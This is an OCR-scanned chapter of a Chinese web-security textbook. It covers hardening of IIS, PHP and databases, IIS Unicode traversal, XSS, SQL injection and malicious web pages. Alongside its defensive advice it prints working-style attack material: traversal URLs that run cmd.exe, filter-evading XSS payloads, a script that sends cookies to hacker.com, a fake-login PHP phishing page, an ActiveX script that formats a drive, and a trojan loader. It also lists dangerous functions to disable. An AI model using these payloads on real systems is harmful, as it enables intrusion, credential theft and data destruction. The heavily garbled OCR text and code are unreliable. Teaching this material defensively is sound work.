13.2.5 Web 应 用 安全 与 Web 防火 墙 


相 较 传统 的 软件 , Web 应 用 具有 其 独特 性 。Web 应 用 往往 是 某 个 机 构 所 独 有 的 应 用 ， 
对 其 存在 的 漏洞 ,已 知 的 通用 漏洞 签名 缺乏 有 效 性 ; 需要 频繁 地 变更 以 满足 业务 目标 ,从 而 
使 得 很 难 维持 有 序 的 开发 周期 ; 需要 全 面 考虑 客户 端 与 服务 端的 复杂 交互 场景 ,而 往往 很 
多 开发 者 没有 很 好 地 理解 业务 流程 ; 人 们 通常 认为 Web 开发 比较 简单 ,缺乏 经 验 的 开发 者 
也 可 以 胜任 。 

关于 Web 应 用 安全 ,理想 情况 下 应 该 在 软件 开发 生命 周期 遵循 安全 编码 原则 ,并 在 各 
阶段 采取 相应 的 安全 措施 。 然 而 ,多 数 网 站 的 实际 情况 是 大 量 早 期 开发 的 Web 应 用 由 于 历 
史 原 因 都 存在 不 同 程度 的 安全 问题 。 对 于 这 些 已 上 线 、 正 提供 生产 的 Web 应 用 ,由 于 其 定 
制 化 特点 决定 了 没有 通用 补丁 可 用 ,整改 代码 也 因 代价 过 大 变 得 较 难 实行 或 者 需要 较 长 的 
整改 周期 。 

面 对 这 种 现状 ,使 用 专业 的 Web 安全 防护 工具 是 一 种 合理 的 选择 。Web 应 用 防火 墙 (以 
下 简称 WAF ) 正 是 这 类 专业 工具 ,其 提供 了 一 种 安全 运 维 控制 手段 ,基于 对 HTTP/HTTPS 流量 
的 双向 分 析 为 Web 应 用 提供 实时 的 防护 。 常 见 的 Web 安全 产品 有 梭 子 鱼 Web 应 用 防火 墙 等 。 


13.3 Web 安全 专用 设置 


1. IS 的 相关 设置 
(1) 删除 默认 建立 的 站 点 的 虚拟 目录 ,停止 默认 Web 站 点 ,删除 对 应 的 文件 目录 C: 


实践 


inetpub ,配置 所 有 站 点 的 公共 设置 ,设置 好 相关 的 连接 数 限制 .带宽 设置 以 及 性 能 设置 等 其 
他 设置 。 

(2) 配置 应 用 程序 映射 ,删除 所 有 不 必要 的 应 用 程序 扩展 ,只 保留 ASP、PHP、CGI、PL、 
ASPX 应 用 程序 扩展 。 对 于 PHP 和 CGI, 推 荐 使 用 ISAPI 方式 解析 ,用 EXE 解析 对 安全 和 
性 能 有 所 影响 。 用 户 程 序 调试 设置 为 发 送 文本 错误 信息 给 客户 。 

(3) 数据 库 尽量 采用 mdb 后 级 ,可 在 TIS 中 设置 一 个 mdb 的 扩展 映射 ,将 这 个 映射 使 
用 一 个 无 关 的 dll 文件 (如 C: WINNTsystem32inetsrvssinc. dll) 来 防止 数据 库 被 下 载 。 

(4) 设置 IIS 的 日 志保 存 目录 ,调整 日 志 记录 信息 ,设置 为 发 送 文 本 错误 信息 。 

(5) 修改 403 错误 页 面 ,将 其 转向 到 其 他 页 ,可 防止 一 些 扫描 器 的 探测 。 

(6) 为 隐藏 系统 信息 ,防止 Telnet 到 80 端口 泄露 系统 版 本 信息 ,可 修改 TIS 的 banner 
信息 ,也 可 以 使 用 Winhex 手工 修改 或 者 使 用 相关 软件 (如 banneredit) ff vc , 

另外 ,用 户 FTP 根 目录 下 对 应 3 个 文件 夹 wwwroot database, logfiles 分 别 存放 站 点 
文件 ,数据库 备 份 和 该 站 点 的 日 志 。 一 旦 发 生 入 侵 事件 ,可 对 该 用 户 站 点 所 在 目录 设置 具体 
的 权限 ,图 片 所 在 的 目录 只 给 予 列 目录 的 权限 ; 程序 所 在 目录 如 果 不 需要 生成 文件 (如 生成 
html 的 程序 ) , 则 不 给 予 写 入 权限 。 


2. ASP 的 安全 设置 


设置 过 权限 和 服务 之 后 ,要 防范 ASP 木马 还 需要 做 以 下 工作 ,在 cmd 窗口 运行 以 下 命 
令 。 将 WScript. Shell ,Shell. application, WScript. Network 组 件 印 载 , 可 有 效 防 止 ASP 木 
马 通过 WScript 或 Shell. application 执行 命令 以 及 使 用 木马 查看 一 些 系 统 敏 感 信 息 。 

regsvr32/u C:\WINNT\System32\wshom. ocx 

del C:\WINNT\System32\wshom. ocx 

regsvr32/u C: WINNT system32Vshell32.dll 

del C: WWINNTNsysten32Vshe1132. dll 

也 可 取消 以 上 文件 的 Users 用 户 的 权限 ,重新 启动 IIS 生效 。 

另外 ,对 于 FSO, 巾 于 用 户 程序 需要 使 用 ,服务 器 上 可 以 不 注销 该 组 件 。 可 以 针对 需要 FSO 
和 不 需要 FSO 的 站 点 设置 两 个 组 ,对 于 需要 FSO 的 用 户 组 给 予 C:\winntsystem32scrrun. dll 
文件 的 执行 权限 ,不 需要 的 不 给 权限 。 重 新 启动 服务 器 即 可 生效 。 


3. PHP 的 安全 设置 


默认 安装 的 PHP 需要 注意 如 下 问题 。 
(1) C:\winnt\php. ini 只 给 予 users 读 权 限 即 可 。 在 php. ini 里 需要 做 如 下 设置 。 


Safe mode = on 

register globals - Off 

allow url fopen - Off 

display errors - Off 

magic_quotes_gpc = On [默认 是 on, 但 需 检查 一 遍 ] 

open_basedir = web 目录 

disable functions = passthru, exec, shell exec, system, phpinfo, get_cfg_var, popen, chmod 


(2) 默认 设置 com. allow. dcom = true 修改 为 false. 


4. MySQL 安全 设置 


如 果 服 务 器 上 启用 了 MySQL 数据 库 , MySQL 数据 库 需 要 注意 的 安全 设置 如 下 。 

(1) 删除 MySQL 中 的 所 有 默认 用 户 , 只 保留 本 地 root 账户 ,并 为 root 用 户 加 上 一 个 
复杂 的 密码 。 

(2) 赋予 普 通用 户 权 限 的 时 候 ,限定 到 特定 的 数据 库 , 尤 其 要 避免 普通 客户 拥有 对 
mysql 数据 库 的 操作 权限 。 

(3) 检查 mysql. user 表 , 取 消 不 必要 用 户 的 shutdown_priv、reload_priv、process_priv 
和 File priv 权限 ,这 些 权 限 可 能 泄露 更 多 服务 器 信息 ,包括 非 MySQL 的 其 他 信息 。 可 以 
为 MySQL 设置 一 个 启动 用 户 ,该 用 户 只 对 MySQL. 目录 有 权限 。 设 置 安装 目录 的 data 数 
据 库 的 权限 (此 目录 存放 了 MySQL 数据 库 的 数据 信息 )。 对 于 MySQL 安装 目录 给 Users 
加 上 读 取 、 列 目录 和 执行 权限 。 


5. 数据 库 服务 器 的 安全 设置 


对 于 专用 的 MSSQL 数据 库 服务 器 ,按照 TCP/IP 筛选 和 IP 策略 ,对 外 只 开放 1433 和 
5631 端口 。 对 于 MSSQL ,首先 需要 为 sa 设置 一 个 强壮 的 密码 ,使 用 混合 身份 验证 ,加 强 数 
据 库 日 志 的 记录 ,审核 数据 库 登 录 事件 的 “成 功 和 失败 ”, 删 除 一 些 不 需要 的 和 危险 的 OLE 
自动 存储 过 程 (会 造成 企业 管理 器 中 部 分 功能 不 能 使 用 ) ,这 些 过 程 如 下 。 


Sp OACreate Sp OADestroy Sp OAGetErrorInfo Sp OAGetProperty 
Sp OAMethod Sp OASetProperty Sp OAStop 


去 掉 不 需要 的 注册 表 访 问 过 程 , 包 括 如 下 过 程 。 


Xp regaddmultistring Xp regdeletekey Xp regdeletevalue 
Xp regenumvalues Xp regread Xp regremovemultistring 
Xp regwrite 


保证 正常 的 系统 能 完成 工作 的 前 提 下 去 掉 其 他 系统 存储 过 程 , 可 以 先 在 测试 机 器 上 测 
试 ,这 些 过 程 如 下 。 

xp cmdshell xp dirtree xp dropwebtask sp addsrvrolemember 

| makewebtask xp runwebtask xp subdirs sp addlogin 

sp addextendedproc 

在 实例 属性 中 选择 TCP/IP 协议 的 属性 。 选 择 隐 藏 SQL Server 实例 可 防止 对 1434 3⁄4 
口 的 探测 ,可 修改 默认 使 用 1433 端口 ,除外 数据 库 的 Guest 账户 把 未 经 认可 的 使 用 者 拒 之 
门 外 。 例 外 情况 是 master 和 tempdb 数据 库 ,因为 对 它们 Suest 账户 是 必需 的 。 另 外 注意 
设置 好 各 个 数据 库 用 户 的 权限 ,对 于 这 些 用 户 , 只 给 予 所 在 数据 库 的 一 些 权 限 。 在 程序 中 不 
要 用 sa 用 户 去 连接 任何 数据 库 。 


13.4 WWW 攻击 与 防范 


1. IIS 解码 漏洞 


2000 4E, NSFOCUS 安全 小 组 制定 的 IIS4.0、IIS5.0 f£ UNICODE 字符 解码 存在 漏洞 ， 


实践 


导致 用 户 远程 通过 TIS 执行 任意 代码 ,打开 Web 根 目录 以 外 的 文件 和 程序 。 

漏洞 原理 是 ,% cl% hh-— 0xc10xhh, % c0% hh-— OxcOxhh. 如果 0xhh 属于 (0x00， 
0x40) ,采用 如 下 解码 方法 。 

% c1 % hh — >(0xc1 — 0xc0) * 0x40 + Oxhh 


例如 如 下 示例 代码 


&cl&1c ->(0xcl — 0xc0) * 0x40 + Oxlc = Ox5c = '/' 
%c0%2f —» (0xc0 — 0xc0) * 0x40 + Ox2f = Ox2f = "V 
然后 就 可 以 利用 漏洞 绕 过 TIS 的 路 径 检查 了 。 

利用 漏洞 还 能 进行 目录 遍历 ,语句 如 下 。 


http://x.x.x.x/scripts/.. % c1% 1c../winnt/system32/cmd.exe?c + dir 
参看 系统 文件 内 容 , 语 句 如 下 。 


http://x.x. x. x/a.asp/.. $cl&1c../.. Scl%1c../winnt/win. ini 
http: //x. x. x. x/default.asp/a. exe/.. $ c151c../.. %c1% 1c. ./winnt/winnt. ini 


复制 文件 ,语句 如 下 。 


http://x. x. x. x/scripts/.. % cl% 1c../winnt/system32/cmd. exe?c + copy + c:\winnt\system32\ 
cmd. exe + ccc. exe 


2. 参数 验证 攻击 


对 用 户 输入 进行 验证 是 所 有 软件 开发 人 员 需 要 面 对 的 一 个 大 问题 。 输 入 认证 常常 通过 
用 户 界 面 的 控件 来 完成 ,如 下 拉 菜 单 ,限制 用 户 的 输入 范围 。 客 户 端 验证 的 优点 是 速度 快 ， 
不 会 增加 服务 器 的 开销 ,但 是 客户 端 验 证 可 能 被 绕 过 ,构建 新 的 页 面 ,利用 工具 修改 参数 等 。 


3. WWW 攻击 的 防范 


(1) 一 般 认为 客户 机 是 不 可 信任 的 ,所 以 在 客户 机 上 对 用 户 输入 进行 的 限制 都 需要 在 
服务 器 端 进行 再 一 次 验证 。 

(2) 设置 验证 输入 的 白 名 单 和 黑 名 单 。 黑 名 单 的 方法 难以 完整 ,最 好 的 方式 是 确定 输 
和 人 的 白 名 单 , 即 只 接受 合理 的 输入 ,杜绝 所 有 不 合理 的 输入 。 

(3) 测试 参数 验证 的 完整 性 ,评估 验证 不 合理 带 来 的 危害 。 


13.5 器 站 脚本 漏洞 


跨 站 点 脚本 (XSS) 又 叫 CSS:Cross-Site-Script, 是 一 种 通过 虚假 页 面 内 容 伪装 用 户 的 方 
法 。 这 种 欺骗 是 通过 易 受 攻击 的 页 面 来 实现 的 。 恶 意 攻击 者 利用 漏洞 往 Web 页 面 里 插入 
恶意 代码 ,用 户 浏 览 时 恶意 代码 被 执行 ,如 图 13-2 所 示 。 

XXS 与 纯 “ 诱 饵 ”的 区 别 在 于 诱饵 向 用 户 提供 完全 虚假 的 页 面 , 是 装扮 成 合法 的 正常 站 
点 ,与 正常 站 点 的 页 面 和 URL 相似 但 完全 不 同 ; 而 XSS 则 是 真实 嵌入 合法 的 页 面 中 。 
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图 13-2 XSS 攻击 


13.5.1 XSS 的 触发 条 件 


XSS 是 软件 缺陷 ,是 由 开发 人 员 导 致 的 。 在 没有 过 滤 字 符 的 情况 下 ,只 需要 保持 完整 
无 错 的 脚本 标记 即 可 触发 XSS, 假 如 用 某 个 资料 表单 提交 内 容 , 表 单 提交 内 容 就 是 某 个 标 
记 属性 所 赋 的 值 ,构造 如 下 值 来 闭 和 标记 构造 完整 无 错 的 脚本 标记 ， 

">< script > alert( 'XSS') ;</script ><" 

结果 形成 如 下 代码 : 

<A HREF = ""7« script > alert('XSS') ;«/script» <""> XSS 攻击 </A> 
这 样 一 个 标记 。 

去 script 二 很 容易 被 过 滤 , 也 可 以 考虑 其 他 途径 触发 。 假 如 要 在 网 页 里 显示 一 张 图 片 ， 
那么 就 要 使 用 一 个 二 img 之 标记 ,语句 如 下 

< img src = " http://www. guet. edu. cn/xss. gif"> 

img 标记 并 不 是 真正 把 图 片 给 加 入 Html 文档 将 两 者 合 二 为 一 ,而 是 通过 src 属性 赋值 。 
浏览 器 的 任务 就 是 解释 这 个 img 标记 ,访问 src 属性 所 赋 的 值 中 的 URL 地 址 并 输出 图 片 。 

浏览 器 不 会 检测 src 属性 所 赋 的 值 , 通 过 javascript 的 URL. 伪 协 议 , 可 以 使 用 
“javascript: ”这 种 协议 说 明 符 加 上 任意 的 javascript 代码 , 当 浏 览 器 装载 这 样 的 URL 时 ， 
便 会 执行 其 中 的 代码 。 语 名 如下。 

< ing src = "javascript:alert( 'XSS');"> 

并 不 是 所 有 标记 的 属性 都 能 用 ,一 般 标记 的 属性 在 访问 文件 才 触 发 XSS,img 标记 有 一 
个 可 以 利用 的 onerror() 事 件 . 当 img 标记 内 含有 一 个 onerror() 事 件 而 正好 图 片 没有 正常 
输出 时 便 会 触发 这 个 事件 ,而 事件 中 可 以 加 入 任意 的 脚本 代码 ,其 中 的 代码 也 会 执行 ,语句 
如 下 。 


< ing src =" http://xss. jpg" onerror = alert( 'XSS')> 


13. 


实践 


5.2 XSS 转 码 引发 的 过 滤 问 题 


网 站 程序 员 常 会 过 滤 类 似 javascript 的 关键 字符 ,让 攻击 者 构造 不 了 XSS.[H* GR 


等 常常 被 忽略 。 


1.“& ”字符 
赋值 语句 可 以 转 成 十 六 进 制 再 赋 给 一 个 变量 运行 ,XSS 的 转 码 就 是 利用 这 个 原理 , 原 


因 是 TE 浏览 器 默认 采用 的 是 UNICODE 编码 ,HTML 编码 可 以 用 ë. # ASCI 方式 来 写 ， 
这 种 KSS 转 码 支持 十 进 制 和 十 六 进 制 , KSS 转 码 针对 属性 所 赋 的 值 ,以 二 img sre = 
"javascript :alert ("XSS ; ">A ff if] Ul F , 


< ing src = "javascript:alert('XSS');"» 
< ing src = "&£ x6a& # x61&# x76&# x61&# x73&# x63&# x72&# x69&# x10&# x74&1 x3a&# x61&# x6c& 
x65& Ë x72&# x74&# x28&# x27&# x58&# x53&# x53&# x27&# x29&fo3b"» // 十 六 进 制 转 码 


2. VFR 
“\" 字 符 在 JavaScript 中 是 转 义 字符 ,可 以 用 来 连接 十 六 进 制 字符 串 运行 代码 ,如 下 。 


< SCRIPT LANGUAGE = "JavaScript" 

eval ("\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3a\ x61 \x6c\x65\x72\x74\x28\x22\x58\x53\ 
x53\x22\x29") 

</SCRIPT> 


3. eval 函数 
eval 函数 是 JavaScript 中 一 个 非常 重要 的 内 置 函数 ,其 实现 了 JavaScript 代码 的 动态 


执行 。 所 谓 动态 执行 , 即 在 程序 的 执行 过 程 中 动态 地 生成 JavaScript 代码 。 


eval 函数 也 可 进行 字符 串 转 换 , 字 符 串 经 eval 转换 后 得 到 一 个 javascript 对 象 ， 比 如 


如 下 示例 。 


var a = eval("5"); 等 效 于 vara = 5; 。 

var a = eval("'5") ; ACT. vara = '5'; 。 

var obj = eval("( (name: 'cat' color: 'black'}))"); 等 效 于 var obj = (name: 'cat'.color: 'black'); 。 
evalC"alertC'hello world! 0 ;"); 等 效 于 alertC'hello world! ;. 


.5.3 攻击 实例 


C) HH cookie, 示 例 代码 如 下 。 


< script> 
Document. write("< img src = http: //hacker. com/px. gif?cookie = " + document. cookie") 
</script> 


(2) 修改 页 面 ,示例 代码 如 下 。 

«script» 

Document. images[38]. src = http://evilhacker.conm/msft. gif 
</script > 


13.6 SQL 注入 攻击 


数据 库 是 Web 应 用 环境 中 非常 重要 的 环节 。SQL 命令 是 前 端 Web 和 后 端 数据 库 之 间 
的 接口 。 当 Web 应 用 向 后 端的 数据 库 提交 数据 时 ,就 可 能 遭 到 这 种 攻击 。SQL 注入 与 
XSS 不同 ,输入 数据 不 是 利用 脚本 ,而 是 SQL 语句 。 

攻击 者 通过 在 URL、 表 格 域 或 者 其 他 输入 域 中 输入 SQL 命令 ,以 此 改变 查询 属性 , 骗 
过 应 用 程序 ,从 而 可 以 对 数据 库 进行 不 受 限 的 访问 。 

SQL 注入 需要 有 数据 库 SQL 语句 的 基础 ,常见 的 SQL 语句 有 Select, Insert, Update, 
delete 等 。 在 网 页 编写 和 数据 库 管 理 两 个 方面 防范 SQL 注入 攻击 。 


1. 网 页 程序 编写 方面 防范 措施 


COD 过 滤 输 入 字 串 中 可 能 隐 含 的 SQL 指令 ,如 Insert, Select, Update 以 及 -- 等 特殊 符号 。 

(2) 设 定 输入 框 的 MaxLength 属性 及 data type. 

(3) 限制 应 用 程序 或 网 页 只 能 拥有 执行 Stored Procedure 的 权限 ,不 能 直接 存 取 数 据 
库 中 的 table。 

(4) 编写 程序 应 使 用 Web Application Vulnerability Scanner 检查 程序 是 否 存在 有 输 
入 信息 漏洞 。 

(5) 部 署 Web Application Firewall。 

(6) 在 SDLC( 软 件 生命 周期 ) 系 统 开 发 生命 周期 中 采用 应 用 程序 安全 的 风险 评估 及 检查 。 

将 使 用 者 输入 的 信息 当做 参数 传 给 SQL 语句 或 Stored Procedure. 


2. 数据 库 管 理 方面 


(1) 删除 多 余 的 公开 表 (程式 开发 .范例 等 ) 。 

(2) 若 无 特 殊 必 要 ,将 其 他 使 用 者 设 定 为 一 般 使 用 者 权限 ,以 避免 数据 库 遭 到 入 侵 。 

(3) 删除 不 必要 但 功能 强大 的 存储 过 程 ,如 xp_cmdshell、xp_regaddmnultistring、 
xp_unpackcab 等 。 

(4) 加 强 对 数据 库 操作 的 检查 。 

(5) 部 署 数据 库 安 全 设备 (如 SQL Guard). 

(6) 使 用 Windows 集成 安全 模式 访问 数据 库 ,避免 使 用 系统 管理 员 的 身份 访问 。 


13.7 针对 80 端口 的 攻击 实例 


1.“”“ ”和 ”..” 请 求 
这 些 攻 击 痕迹 普遍 用 于 Web 应 用 程序 和 Web 服务 器 , 它 用 于 允许 攻击 者 或 者 蠕虫 病 


实践 


毒 程序 改变 Web 服务 器 的 路 径 , 获 得 访问 非 公 开 的 区 域 。 大 多 数 CGI 程序 漏洞 含有 这 些 
“.… ”请 求 。 例 如 如 下 语句 。 


http://host/cgi - bin/lame. cgi?file=../../../../etc/motd 


这 个 例子 展示 了 攻击 者 请 求 motd 这 个 文件 ,如 果 攻 击 者 有 能 力 突破 Web 服务 器 根 目 
录 , 那 么 可 以 获得 更 多 的 信息 ,并 进一步 地 获得 特权 。 


2.“%20” 请 求 


%20 是 表示 空格 的 十 六 进 制 值 。 浏 览 日 志 的 时 候 会 发 现在 一 些 Web 服务 器 上 运行 的 
应 用 程序 中 ,这 个 字符 可 能 会 被 有 效 执行 。 所 以 应 该 仔细 查看 日 志 。 另 外 ,此 请 求 有 时 也 可 
以 帮助 执行 一 些 命令 。 例 如 如 下 语句 。 


http://host/cgi— bin/lame. cgi?page = ls % 20 - al 


这 个 例子 展示 了 攻击 者 执行 了 一 个 UNIX 的 命令 , 列 出 请 求 的 整个 目录 的 文件 ,导致 
攻击 者 访问 系统 中 重要 的 文件 ,为 其 进一步 取得 特权 提供 条 件 。 


3.“%00” 请 求 


%00 表示 十 六 进 制 的 空 字 节 , 能 够 用 于 欺骗 Web 应 用 程序 ,并 请 求 不 同类 型 的 文件 。 
例如 如 下 代码 。 


http: //host/cgi - bin/lame. cgi?page = index. html 


这 可 能 是 个 有 效 的 请 求 ,如 果 攻击 者 注意 到 这 个 请 求 动作 成 功 ,会 进一步 寻找 这 个 cgi 
程序 的 问题 。 比 如 如 下 代码 。 


http://host/cgi-bin/lame. cgi?page = ../../../../etc/motd 


cgi 程序 要 检查 这 个 请 求 文件 的 后 级 名 ,如 . html. shtml 或 者 其 他 类 型 的 文件 。 大 多 数 
程序 会 显示 所 请 求 的 文件 类 型 无 效 ,请 求 的 文件 必须 是 某 一 个 字符 后 级 的 文件 类 型 ,这 样 攻 
击 者 就 可 以 获得 系统 的 路 径 及 文件 名 ,导致 更 多 关于 系统 的 敏感 信息 的 泄露 。 


http://host/cgi— bin/lame.cgi?page- ../../../../etc/motd% 00html 


一 些 应 用 程序 由 于 检查 有 效 的 请 求 文件 不 够 严密 ,以 上 请 求 将 骗取 cgi 程序 认为 这 个 
文件 是 个 确定 的 可 接受 的 文件 类 型 ,这 是 黑客 常用 的 方法 。 


4. “PAR 

这 是 个 管道 字符 ,在 UNIX 系统 中 用 于 帮助 在 一 个 请 求 中 同时 执行 多 个 系统 命令 。 例 如 
命令 * 井 cat access_log| grep -i '..'//” 将 显示 日 志 中 的 “.. ”请 求 ,常用 于 发 现 蠕虫 攻击 。 

常常 可 以 看 到 有 很 多 Web 应 用 程序 用 这 个 字符 ,这 也 导致 IDS 日 志 中 错误 的 报警 。 在 
程序 仔细 的 检查 中 ,这 样 是 有 好 处 的 ,可 以 降低 入 侵 检测 系统 中 的 错误 警报 。 


请 求 命令 执行 “http://host/cgi-bin/lame. cgi? page=. . /. . /.. /. . /bin/1ls", 
请 求 在 UNIX 系统 中 列 出 /etc 目录 下 的 所 有 文件 ,语句 如 下 。 


http: //host/cgi - bin/lame.cgi?page- ../../../.. /bin/1s $20 - al % 20/etc 


请 求 cat 命令 的 执行 ,并 且 grep 命令 也 将 执行 ,查询 lame, 代 码 如 下 : 


http: //host/cgi - bin/lame. cgi?page = cat % 20access log|grep$& 20 - i % 20'lame' 
5. cmd.exe 


这 是 一 个 Windows 的 shell, 攻 击 者 如 果 访 问 并 运行 这 个 脚本 ,在 服务 器 设置 允许 的 条 
件 下 可 以 在 Windows 机 器 上 做 任何 事情 ,很 多 的 蠕虫 病毒 就 是 通过 80 端口 ,传播 到 远程 的 
机 器 上 ,例如 如 下 代码 。 


http://host/scripts/WINNT/system32/cmd. exe?dir + e: 

6. "« ”请 求 

作为 系统 命令 中 的 一 个 参数 ,如 得 到 某 一 类 型 的 所 有 文件 等 。 
7.“~ "请 求 

判断 目标 系统 上 是 否 存在 指定 的 用 户 , 如 "http://host/ 一 hu”。 
8. "ick 

可 用 于 SQL 注入 攻击 。 

9. 缓冲 区 溢出 攻击 

发 类 似 请 求 , 语 句 如 下 。 


http: //host/cgi - bin/helloworld? type = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


AAAA 


可 以 测试 CGI 程序 是 否 存在 缓冲 区 溢出 漏洞 。 


13.8 利用 XSS 钓鱼 


CD 在 网 页 里 插入 恶意 代码 ,语句 如 下 。 
= src = http://evilhacker. com/iai. php></img> 


(2) 编写 iai. php ,语句 如 下 。 


<?php 

global $ username, $ passwd, $ host 

If (!isset( $ SERVER['PHP AUTH USER']) 

(header( 'WWW — Authenticate:Basic realm = "test"); 

Header("HTTP/1.0 401 Unauthorized"); exit;) // 弹 出 认证 对 话 框 
$ username = $ SERVER['PHP AUTH USER']; 


实践 


fwrite(-); 


(3) 防范 ,从 用 户 提交 的 输入 数据 中 过 滤 掉 代码 VAI DUSEUE — script </script>, 
包括 HTML JavaScript, VBScript, Java 等 脚本 语言 。 只 允许 合法 的 输入 ,在 HTML 中 ,所 
有 代码 都 包含 在 一 对 尖 括 号 (二 二 ) 内 ,最 好 转化 为 &lt 和 gt, 

Web 用 户 的 防范 ,在 电子 邮件 或 者 即时 通信 软件 中 单 击 链接 时 需要 格外 小 心 ,留心 可 
疑 的 过 长 链接 ,尤其 是 它们 看 上 去 包含 了 HTML 代码 。 如 果 对 其 产生 怀疑 ,可 以 在 浏览 器 
地 址 栏 中 手工 输入 域名 ,而 后 通过 该 页 面 中 的 链接 浏览 所 要 的 信息 。 

对 于 XSS 漏洞 ,没有 哪 种 Web 浏览 器 具有 明显 的 安全 优势 ,Firefox 也 同样 不 安全 。 为 了 
获得 更 多 安全 性 ,可 以 安装 浏览 器 插件 (比如 Firefox 的 NoScript 或 者 Netcraft 工具 条 ) 。 

对 于 开发 者 ,首先 应 该 把 精力 放 到 对 所 有 用 户 提交 内 容 进行 可 靠 的 输入 验证 上 。 这 些 
提交 内 容 包 括 URL 查询 关键 字 http k post 数据 等 。 只 接收 在 规定 长 度 范围 内 、 采 用 适 
当 格 式 、 所 希望 的 字符 。 阻 塞 、 过 滤 或 者 忽略 其 他 任何 东西 。 

保护 所 有 敏感 的 功能 ,以 防 被 bots 自动 化 或 者 被 第 三 方 网 站 所 执行 。 实 现 session 标 
记 (session tokens), CAPTCHA 系统 或 者 HTTP 引用 头 检查 。 

如 果 Web 应 用 必须 支持 用 户 提供 的 HTML ,那么 应 用 的 安全 性 将 严重 下 滑 。 但 还 是 可 以 
做 一 些 事 来 保护 Web 站 点 ,确认 接收 到 的 HTML 内 容 被 妥善 地 格式 化 , 仅 包含 最 小 化 的 、 安 
全 的 tag( 绝 对 没有 JavaScript) ,去 掉 任 何 对 远程 内 容 的 引用 (尤其 是 样式 表 和 JavaScript) 。 


13.9 恶意 网 页 攻击 举例 


(1) 弹出 无 穷 多 的 窗口 ,语句 如 下 。 


<html> 
<head> 
< script language = "JavaScript"> 
<! — hide -一 > 
function pop() 
{ for(i=1;i<=999999;i++) 
(windows. open( 'a. htm', 'width = 800, height = 600', 'status = off', 'location = off', 'toolbar = off', 
'scrollbars - off')] 
) 
</script> 
</head> 
< body> 
< form name = "form">< p align = "center"> 
< input type = "button" value = "enter" onClick = "pop()" name = "button" class = "unnamed1"> 


</p> 

</form> 
</body> 
</html> 
(2) 窗口 冻结 ,语句 如 下 。 
<html> 


<head> </head> 
<body> 


< script language = "JavaScript" 
function = freeze() 
t 
alert(' 从 现在 开始 不 再 响应 !!1!'); 
while(true) 
{windows. history. back( — 1)} 
} 
</script> 
<form> 
< input type = "button" value = "freeze" onClick = "freeze()"> 
</form> 
</body> 
</html> 


(3) 利用 ActiveX, 语 句 如 下 。 


<html> 

<head> 

«object id= "scr" classid = "clsid:06290BD5 — 48AA - 11D2 - 8432 — 006008C3FBFC" width = "14" 
height = "14"> 

</object> 

< script language = "JavaScript" 

scr. Reset(); 

scr. Path = "C: NNWINDOSWNNStrar Menu Programs WM ri 2l test. htm" ; 
scr. Doc = "< object id = 'wsh' classid = 'clsid: F935DC22 - 1CF0 - 11D0 — ADB9 — 00CO4FD58AO0B '> 
</object > 

< srcipt > wsh. Run( 'start/m format a: /autotest/u'); 

alert('IMPORTANT:Windows is removing unused temporary files. '); 

«/" + "script>"; 

scr. write( ); 

</script> 

</head> 

<body></body> 

</html > 


(4) 网 页 木马 。 在 网 页 当中 嵌入 脚本 代码 来 创建 或 下 载 木马 ,代码 如 下 。 


< script language = "JavaScript"> 

run_exe = "< object id = V'runitV" width = 0 height = 0 type = V'application/x- oleobject\"" 
run exe += "codebase = \"muma. exe # version = 1,1,1,1V'2" 

run_exe += "< param name = \"_Version\" value = \"65536\">" 

run_exe += "</object >" 

run exe += "< html >< hl > 网 页 加 载 中 ,请 稍 后 ...</hl ></html >"; 


document. open() ; 


document. clear(); 
document. writeln(run exe); 
document. close(); 
</script> 


Web 安全 实验 


【实验 目的 】 
CD 了 解 IIS 服务 器 的 安全 漏洞 以 及 安全 配置 。 


实践 


(2) 了 解 SSL 协议 的 工作 原理 。 

(3) 熟悉 基于 IIS 服务 器 的 SSL 配置 。 

【实验 环境 】 

通过 局 域 网 互 连 的 若干 台 PC。 其 中 ,一 台 安 装 Windows 2003 Server, 安 装 并 配置 证 书 
服务 ,担任 CA 服务 器 ; 一 台 安 装 Windows XP 和 IIS 服务 ,担任 Web 服务 器 ; 其 余 安 装 
Windows XP, 作 为 客户 端 实验 机 。 

【实验 任务 】 

(1) 了 解 基 于 Windows 的 数字 证 书 服务 器 的 建立 过 程 。 

(2) 了 解 安 全 Web 服务 器 的 配置 。 

(3) 熟悉 数字 证 书生 成 .申请 、 使 用 的 全 过 程 。 

【实验 步骤 】 

1) IIS 服务 器 的 安全 配置 

CD 确定 IIS 与 系统 安装 在 不 同 的 分 区 。 

O 删除 不 必要 的 虚拟 目录 。 打 开 x NwwwrootC * 代表 IIS 安装 的 路 径 ) 文 件 夹 ,删除 
IIS 安装 完成 后 默认 生成 的 目录 ,包括 ISHelp IISAdmin IISSamples 等 。 

@ 停止 默认 网 站 或 修改 主 目录 。 在 “Internet 服务 管理 器 ”窗口 中 右 击 “默认 Web 网 
站 ”项 ,选择 “停止 "命令 ,然后 根据 需要 起 用 自己 创建 的 站 点 ; 或 者 在 “Internet 服务 管理 器 ” 
窗口 中 右 击 所 选 网 站 后 选择 “属性 ”命令 ,然后 在 主 目录 页 面 中 修改 本 地 路 径 。 

CD 对 IIS 的 文件 和 目录 进行 分 类 ,区 别 设置 权限 。 右 击 Web 主 目录 中 的 文件 和 目录 后 
选择 “属性 ”命令 ,然后 按 需 要 给 它们 分 配 适 当 的 权限 (静态 文件 允许 读 ,拒绝 写 ; ASP 和 
exe 允许 执行 ,拒绝 读 写 ; 所 有 文件 和 目录 将 Everyone 用 户 组 的 权限 设置 为 “只 读 ”)。 

@ 删除 不 必要 的 应 用 程序 映射 。 在 “Internet 服务 管理 器 "窗口 中 右 击 所 选 网 站 ,选择 命 
令 打 开 属性 对 话 框 ,在 “ 主 目录 ”页面 选项 卡 中 单 击 * 配 置 ?按钮 ,弹出 * 应 用 程序 映射 ?对 话 框 ， 
删除 无 用 的 程序 映射 ,比如 对 于 ASP 网 站 只 需要 留 下 . asp、. aspx, WE 13-3、 图 13-4 所 示 。 
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图 13-3 “ 主 目录 ”选项 卡 
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扩展 名 “可 执行 文件 路 径 
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图 13-4 应 用 程序 设置 


维护 日 志 安全 。 在 “Internet 服务 管理 器 "窗口 中 右 击 所 选 网 站 后 选择 “属性 ”命令 ， 
在 打开 的 对 话 框 中 切换 到 “网 站 ”选项 卡 , 勾 选 “启用 日 志 目 录 ” 复 选 框 , 单 击 “ 属 性 ”按钮 ,如 
